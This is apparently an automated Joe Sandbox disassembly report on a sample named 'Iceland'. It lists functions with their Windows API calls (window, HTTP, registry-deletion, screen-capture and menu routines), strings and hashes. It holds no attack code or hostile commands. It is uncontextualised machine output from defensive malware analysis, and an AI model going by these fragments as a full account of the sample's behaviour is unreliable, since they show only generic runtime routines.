Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
String ID: 0
API String ID: 36266755-4108050209
Opcode ID: b6a173085e2eed0576e4176bdd7629e5df4efa15d028ee2a667dfcca34189345
Instruction ID: 93664df4f04a4e2b3f3d25d1638f6269a86e0a53dcacc73eb297890c97685445
Opcode Fuzzy Hash: b6a173085e2eed0576e4176bdd7629e5df4efa15d028ee2a667dfcca34189345
Instruction Fuzzy Hash: D771F471A04205BBFB21CF2ADC89FAABF78FF45368F108216F915661D0C7719954DB90

Function 009A7711 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 194windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000,?), ref: 009A7823

Part of subcall function 00918577: _wcslen.LIBCMT ref: 0091858A

CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 009A7897
SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 009A78B9
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 009A78CC
DestroyWindow.USER32(?), ref: 009A78ED
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00910000,00000000), ref: 009A791C
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 009A7935
GetDesktopWindow.USER32 ref: 009A794E
GetWindowRect.USER32(00000000), ref: 009A7955
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 009A796D
SendMessageW.USER32(00000000,00000421,?,00000000), ref: 009A7985

Part of subcall function 00912234: GetWindowLongW.USER32(?,000000EB), ref: 00912242

Strings

tooltips_class32, xrefs: 009A7890, 009A7915
0, xrefs: 009A77D0

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
String ID: 0$tooltips_class32
API String ID: 2429346358-3619404913
Opcode ID: dc0aeab94769989d515b4bb3d611b7b832d9117eaddae63ae8c8404f570f3b8f
Instruction ID: d55da3451a312c61131175747a456f359a6d58d5ce7904dbbbbe7a9dcc0e1ad2
Opcode Fuzzy Hash: dc0aeab94769989d515b4bb3d611b7b832d9117eaddae63ae8c8404f570f3b8f
Instruction Fuzzy Hash: 93717771108244AFD725CF58CC89BABBBE9EFCA304F14445EF98587261CB74A906EB91

Function 009A9B7A Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 181windowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 0091249F: GetWindowLongW.USER32(00000000,000000EB), ref: 009124B0

DragQueryPoint.SHELL32(?,?), ref: 009A9BA3

Part of subcall function 009A80AE: ClientToScreen.USER32(?,?), ref: 009A80D4
Part of subcall function 009A80AE: GetWindowRect.USER32(?,?), ref: 009A814A
Part of subcall function 009A80AE: PtInRect.USER32(?,?,?), ref: 009A815A

SendMessageW.USER32(?,000000B0,?,?), ref: 009A9C0C
DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 009A9C17
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 009A9C3A
SendMessageW.USER32(?,000000C2,00000001,?), ref: 009A9C81
SendMessageW.USER32(?,000000B0,?,?), ref: 009A9C9A
SendMessageW.USER32(?,000000B1,?,?), ref: 009A9CB1
SendMessageW.USER32(?,000000B1,?,?), ref: 009A9CD3
DragFinish.SHELL32(?), ref: 009A9CDA
DefDlgProcW.USER32(?,00000233,?,00000000), ref: 009A9DCD

Strings

@GUI_DRAGID, xrefs: 009A9D45
@GUI_DROPID, xrefs: 009A9CFA
@GUI_DRAGFILE, xrefs: 009A9D7C

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
API String ID: 221274066-3440237614
Opcode ID: e2cf1ea3652180ab829802ca22f99c244693ef01e3467119dee2d2484b9cdb8b
Instruction ID: 5651e7baeb40558b8c5cf0dc76b8c497e9dd4b7842901f2406268bd531a8c86f
Opcode Fuzzy Hash: e2cf1ea3652180ab829802ca22f99c244693ef01e3467119dee2d2484b9cdb8b
Instruction Fuzzy Hash: B9616771208305AFC305EF60DC85E9FBBE9FFC9750F40091EB596922A1DB709A49CB92

Function 0098CEBB Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 143networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0098CEF5
GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0098CF08
SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0098CF1C
HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0098CF35
InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 0098CF78
InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0098CF8E
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0098CF99
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0098CFC9
GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0098D021
SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0098D035
InternetCloseHandle.WININET(00000000), ref: 0098D040

Strings

, xrefs: 0098CFBA

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
String ID:
API String ID: 3800310941-3916222277
Opcode ID: a06715519fec1aeaa80b3e9f03263c31c0a4beebfe3277029c666bef2c6f55cb
Instruction ID: 7cfa62cb8ec32c5be579c655769e9d8098632454139575182f306f5b75ff092c
Opcode Fuzzy Hash: a06715519fec1aeaa80b3e9f03263c31c0a4beebfe3277029c666bef2c6f55cb
Instruction Fuzzy Hash: 89517BB1506608BFEB21AF61CC88ABB7BBCFF49744F00841AF946D6650D734D945EBA0

Function 009A8FCB Relevance: 22.6, APIs: 15, Instructions: 131filecommemoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,009A66D6,?,?), ref: 009A8FEE
GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,009A66D6,?,?,00000000,?), ref: 009A8FFE
GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,009A66D6,?,?,00000000,?), ref: 009A9009
CloseHandle.KERNEL32(00000000,?,?,?,?,009A66D6,?,?,00000000,?), ref: 009A9016
GlobalLock.KERNEL32(00000000), ref: 009A9024
ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,009A66D6,?,?,00000000,?), ref: 009A9033
GlobalUnlock.KERNEL32(00000000), ref: 009A903C
CloseHandle.KERNEL32(00000000,?,?,?,?,009A66D6,?,?,00000000,?), ref: 009A9043
CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,009A66D6,?,?,00000000,?), ref: 009A9054
OleLoadPicture.OLEAUT32(?,00000000,00000000,009B0C04,?), ref: 009A906D
GlobalFree.KERNEL32(00000000), ref: 009A907D
GetObjectW.GDI32(00000000,00000018,?), ref: 009A909D
CopyImage.USER32(00000000,00000000,00000000,?,00002000), ref: 009A90CD
DeleteObject.GDI32(00000000), ref: 009A90F5
SendMessageW.USER32(?,00000172,00000000,00000000), ref: 009A910B

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
String ID:
API String ID: 3840717409-0
Opcode ID: cbb3e870a824a36453840a668ac93ec308a81e76f8f90d32c24666f1e03e055f
Instruction ID: 807e1ecead9c132673b067cfb389b25dfc04deb6db915f024d4a2231675ffd71
Opcode Fuzzy Hash: cbb3e870a824a36453840a668ac93ec308a81e76f8f90d32c24666f1e03e055f
Instruction Fuzzy Hash: 1F413771605218AFDB119F65DC88EAB7BBCFF8A754F104058F916D7260DB309941DBA0

Function 0099C06E Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 285registrylibraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 0091B329: _wcslen.LIBCMT ref: 0091B333

Part of subcall function 0099D3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0099C10E,?,?), ref: 0099D415
Part of subcall function 0099D3F8: _wcslen.LIBCMT ref: 0099D451
Part of subcall function 0099D3F8: _wcslen.LIBCMT ref: 0099D4C8
Part of subcall function 0099D3F8: _wcslen.LIBCMT ref: 0099D4FE

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0099C154
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0099C1D2
RegDeleteValueW.ADVAPI32(?,?), ref: 0099C26A
RegCloseKey.ADVAPI32(?), ref: 0099C2DE
RegCloseKey.ADVAPI32(?), ref: 0099C2FC
LoadLibraryA.KERNEL32(advapi32.dll), ref: 0099C352
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0099C364
RegDeleteKeyW.ADVAPI32(?,?), ref: 0099C382
FreeLibrary.KERNEL32(00000000), ref: 0099C3E3
RegCloseKey.ADVAPI32(00000000), ref: 0099C3F4

Strings

RegDeleteKeyExW, xrefs: 0099C35E
advapi32.dll, xrefs: 0099C34D

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 146587525-4033151799
Opcode ID: 64695fc509a15e425d9667def5790357706a77a956e712a7e94fd5103bc83211
Instruction ID: f9790d1ef5d6a353296a03c08d90e7db828f59f778d970d513640910978be8fa
Opcode Fuzzy Hash: 64695fc509a15e425d9667def5790357706a77a956e712a7e94fd5103bc83211
Instruction Fuzzy Hash: 76C19F75208201AFDB14DF18C885F6ABBE5BF85304F54849CF4668B7A2CB35ED86CB91

Function 00992FB9 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 169windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00993035
CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00993045
CreateCompatibleDC.GDI32(?), ref: 00993051
SelectObject.GDI32(00000000,?), ref: 0099305E
StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 009930CA
GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 00993109
GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 0099312D
SelectObject.GDI32(?,?), ref: 00993135
DeleteObject.GDI32(?), ref: 0099313E
DeleteDC.GDI32(?), ref: 00993145
ReleaseDC.USER32(00000000,?), ref: 00993150

Strings

(, xrefs: 009930EA

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
String ID: (
API String ID: 2598888154-3887548279
Opcode ID: 0938a341b1422c35dedcdd3895061a2f677c6eb7322328b751afd7abc1410cc0
Instruction ID: 594aedf4323a2a600f83a6827666a5810f9d31e9b06b5c7a81cc369b8d0a3403
Opcode Fuzzy Hash: 0938a341b1422c35dedcdd3895061a2f677c6eb7322328b751afd7abc1410cc0
Instruction Fuzzy Hash: 176103B5D15219EFCF04CFA8D884EAEBBB5FF88310F208529E556A7210D771A941DF90

Function 009AA94F Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 271windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0091249F: GetWindowLongW.USER32(00000000,000000EB), ref: 009124B0

GetSystemMetrics.USER32(0000000F), ref: 009AA990
GetSystemMetrics.USER32(00000011), ref: 009AA9A7
GetSystemMetrics.USER32(00000004), ref: 009AA9B3
GetSystemMetrics.USER32(0000000F), ref: 009AA9C9
MoveWindow.USER32(00000003,?,?,00000001,?,00000000,?,00000000,?,00000000), ref: 009AAC15
SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 009AAC33
SendMessageW.USER32(00000003,00000469,?,00000000), ref: 009AAC54
ShowWindow.USER32(00000003,00000000), ref: 009AAC73
InvalidateRect.USER32(?,00000000,00000001), ref: 009AAC95
DefDlgProcW.USER32(?,00000005,?), ref: 009AACBB

Strings

@, xrefs: 009AABD0

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: MetricsSystem$Window$MessageSend$InvalidateLongMoveProcRectShow
String ID: @
API String ID: 3962739598-2766056989
Opcode ID: 59fa910edde13ae519fd9bd4379abe322818f60d37145ed430273a6cf9b06db1
Instruction ID: 81183a86b25d09b6d7411bac11278a74949d846e38a11f267e1a6762d8e78264
Opcode Fuzzy Hash: 59fa910edde13ae519fd9bd4379abe322818f60d37145ed430273a6cf9b06db1
Instruction Fuzzy Hash: 98B19A70600219DFDF14CF69C9847AE7BF6FF46710F188069EC859B295D774A980CBA1

Function 009752AA Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 259COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000400), ref: 009752E6
GetWindowTextW.USER32(?,?,00000400), ref: 00975328
_wcslen.LIBCMT ref: 00975339
CharUpperBuffW.USER32(?,00000000), ref: 00975345
_wcsstr.LIBVCRUNTIME ref: 0097537A
GetClassNameW.USER32(00000018,?,00000400), ref: 009753B2
GetWindowTextW.USER32(?,?,00000400), ref: 009753EB
GetClassNameW.USER32(00000018,?,00000400), ref: 00975445
GetClassNameW.USER32(?,?,00000400), ref: 00975477
GetWindowRect.USER32(?,?), ref: 009754EF

Strings

ThumbnailClass, xrefs: 009753BD, 00975450

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
String ID: ThumbnailClass
API String ID: 1311036022-1241985126
Opcode ID: 8dd448af9a2863601c0e4a5811e6a06f298c3bf66e43760887993752cacd5301
Instruction ID: eacad3fece450522d1e20d7411fde6c8c432673c218938088f3fcbc23582e010
Opcode Fuzzy Hash: 8dd448af9a2863601c0e4a5811e6a06f298c3bf66e43760887993752cacd5301
Instruction Fuzzy Hash: D191F772104B06EFD748DF24C884BAAB7ADFF45304F018519FA8E820A1EBB1ED55CB91

Function 009A976A Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 221windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0091249F: GetWindowLongW.USER32(00000000,000000EB), ref: 009124B0

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 009A97B6
GetFocus.USER32 ref: 009A97C6
GetDlgCtrlID.USER32(00000000), ref: 009A97D1
DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?), ref: 009A9879
GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 009A992B
GetMenuItemCount.USER32(?), ref: 009A9948
GetMenuItemID.USER32(?,00000000), ref: 009A9958
GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 009A998A
GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 009A99CC
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 009A99FD

Strings

0, xrefs: 009A98FB

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
String ID: 0
API String ID: 1026556194-4108050209
Opcode ID: 60c3ce4c08dbadfb1869d4c3e2c0097d72bca750a208a5b02b126e957ede74ab
Instruction ID: f4e1e3ebff67c04411ffb38c57587ce970f9fd825cf3897b4c3a077a1e0be4fd
Opcode Fuzzy Hash: 60c3ce4c08dbadfb1869d4c3e2c0097d72bca750a208a5b02b126e957ede74ab
Instruction Fuzzy Hash: 1681AD71A08311AFDB10CF29C884AAB7BE8FF8A354F10091DF98597291DB74D905DBE2

Function 0097C8F7 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 190windowsleepCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(009E29C0,000000FF,00000000,00000030), ref: 0097C973
SetMenuItemInfoW.USER32(009E29C0,00000004,00000000,00000030), ref: 0097C9A8
Sleep.KERNEL32(000001F4), ref: 0097C9BA
GetMenuItemCount.USER32(?), ref: 0097CA00
GetMenuItemID.USER32(?,00000000), ref: 0097CA1D
GetMenuItemID.USER32(?,-00000001), ref: 0097CA49
GetMenuItemID.USER32(?,?), ref: 0097CA90
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0097CAD6
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0097CAEB
SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0097CB0C

Strings

0, xrefs: 0097C904

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountRadioSleep
String ID: 0
API String ID: 1460738036-4108050209
Opcode ID: 3ff14fff3cc84ccb3d48ee19f2f31fd8f3c45942f54057efc69ba3ae6887b30e
Instruction ID: fd9eb3593cd9c6bd0dc4be448a4d1eb9a0076a6da09f5cd340f56735942fbb90
Opcode Fuzzy Hash: 3ff14fff3cc84ccb3d48ee19f2f31fd8f3c45942f54057efc69ba3ae6887b30e
Instruction Fuzzy Hash: AE61AEB2A10249AFDF15CF64D889AEE7BB8FF45344F048019F95AA3291D734AD00DB60

Function 0097E4C2 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 178COMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.VERSION(?,?), ref: 0097E4D4
GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 0097E4FA
_wcslen.LIBCMT ref: 0097E504
_wcsstr.LIBVCRUNTIME ref: 0097E554
VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 0097E570

Strings

%u.%u.%u.%u, xrefs: 0097E64E
04090000, xrefs: 0097E5A6
DefaultLangCodepage, xrefs: 0097E5D3
\VarFileInfo\Translation, xrefs: 0097E568
StringFileInfo\, xrefs: 0097E543

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: FileInfoVersion$QuerySizeValue_wcslen_wcsstr
String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
API String ID: 1939486746-1459072770
Opcode ID: f7a39713bf84f9a710e482c20ec5baa3f0fe4059f66c9819b33ded5cbe7ca355
Instruction ID: b6db6e9f6d4fba2eb7432a0f0b2779c53c8cc53727bd3ed4c7bb3cbfc55470ae
Opcode Fuzzy Hash: f7a39713bf84f9a710e482c20ec5baa3f0fe4059f66c9819b33ded5cbe7ca355
Instruction Fuzzy Hash: 8F4148726042187BDB00ABA49C47FBF776CDFD5720F00406AF905A6182FB75AA01AAA5

Function 0099D694 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 104registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0099D6C4
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 0099D6ED
FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0099D7A8

Part of subcall function 0099D694: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 0099D70A
Part of subcall function 0099D694: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 0099D71D
Part of subcall function 0099D694: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0099D72F
Part of subcall function 0099D694: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0099D765
Part of subcall function 0099D694: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0099D788

RegDeleteKeyW.ADVAPI32(?,?), ref: 0099D753

Strings

RegDeleteKeyExW, xrefs: 0099D729
advapi32.dll, xrefs: 0099D718

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 2734957052-4033151799
Opcode ID: b0a27af6ad97a4536564a78a8f4c168dcccc6f4cf7f3ff8bf09208ad7c37d39b
Instruction ID: 47dc6e4cb1156059dd42be71bd17d8667b739a5c3c80a3318810f662773cc6a7
Opcode Fuzzy Hash: b0a27af6ad97a4536564a78a8f4c168dcccc6f4cf7f3ff8bf09208ad7c37d39b
Instruction Fuzzy Hash: F73160B5942129BBDB219B95DCC8EFFBB7CEF46710F000165F806E2140DB349E45AAE0

Function 0097EFC7 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 0097EFCB

Part of subcall function 0092F215: timeGetTime.WINMM(?,?,0097EFEB), ref: 0092F219

Sleep.KERNEL32(0000000A), ref: 0097EFF8
EnumThreadWindows.USER32(?,Function_0006EF7C,00000000), ref: 0097F01C
FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 0097F03E
SetActiveWindow.USER32 ref: 0097F05D
SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 0097F06B
SendMessageW.USER32(00000010,00000000,00000000), ref: 0097F08A
Sleep.KERNEL32(000000FA), ref: 0097F095
